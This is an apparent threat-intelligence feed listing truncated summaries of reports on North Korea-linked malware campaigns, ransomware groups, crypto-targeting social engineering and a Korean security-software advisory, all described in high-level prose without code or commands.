778 reports
Paolo Caversaccio analyzed `1inch-analysis.app`, a malicious macOS bundle sent to 1inch cofounder Anton Bukov by the fake security researcher persona Nick L. Franklin. The source attributes the incident with high confidence to the AppleJeus/Citrine Sleet/…
The archived investigation examines the Nick L. Franklin persona, alleging that a blockchain security identity may have been used for DPRK-linked social engineering against cryptocurrency researchers and projects. The source cites a suspicious file sent t…
ESTsecurity warns that RokRAT malware is being distributed through a malicious LNK file disguised as an academic paper under submission in the defense field. When executed, the shortcut runs embedded PowerShell code, drops a decoy PDF alongside toy01.dat,…
ESET profiles RansomHub as the dominant ransomware-as-a-service group that rose after law-enforcement disruption of LockBit and BlackCat. The research links RansomHub activity to tooling trails associated with Play, Medusa, and BianLian affiliates and doc…
K7 Labs analyzes a Kimsuky attack chain built from a ZIP archive containing a VBScript, a PowerShell script, and two encoded text files. The VBScript dynamically builds and runs a command that launches 1.ps1, which decodes 1.log, collects the BIOS serial …
JPCERT/CC argues that Lazarus should be treated as a collection of overlapping subgroups rather than a single actor label, because shared tooling, infrastructure, and social-engineering tradecraft now blur campaign and group boundaries. The article explai…
A Kimsuky-themed analysis examines a copyright-related lure delivered as a Windows .url shortcut file named to look like copyright documentation. The shortcut uses an Edge browser icon and a crafted file:// URL referencing invoice-docs-file[.]site and rea…
SEAL tracks ELUSIVE COMET as an active threat to cryptocurrency users, using carefully built personas and entities such as Aureon Capital, Aureon Press, and The OnChain Podcast to appear legitimate. The actor initiates contact through Twitter DMs or email…
KRCERT issued a vulnerability advisory for Korean security and keyboard-protection products AnySign4PC, TouchEn nxKey, and CrossEX. The advisory says AnySign4PC can expose internal information through a vulnerability, TouchEn nxKey is affected by buffer-o…
Zoth lost about $8.4 million after an attacker used compromised admin privileges to upgrade the USD0PPSubVaultUpgradeable proxy contract and drain funds. The attack withdrew 8.85 million USD0++ tokens, converted them to DAI, and transferred the proceeds a…
BCA LTD describes a North Korean corporate-espionage campaign and a newly named malware family, Chaotic Capybara. The Spanish-language report places the activity within the broader Lazarus Group ecosystem and discusses Chollima-labeled DPRK clusters such …
Chollima Group found an exposed Google Drive folder tied to a North Korean IT worker that contained identity documents, resumes, payment records, notes and IP Messenger chat logs from late 2022 to early 2023. The logs show roughly 500 direct messages acro…
APT37 activity is described using malicious LNK files disguised as Microsoft Store update content to trigger infection. When executed, the LNK drops a decoy document and batch file, changes the shortcut into an HTML file, and uses obfuscated code to retri…
The malware uses a custom protocol designed to mimic HTTPS traffic, adding another layer of stealth. Organizations should also educate users on social engineering tactics and implement strict security policies to prevent such malware infections. Once inst…
DNSC reports an active phishing campaign that it assesses is very likely linked to Konni, a North Korea-associated group often discussed alongside APT37 and Kimsuky. The infection chain uses malicious Windows LNK email attachments that run hidden PowerShe…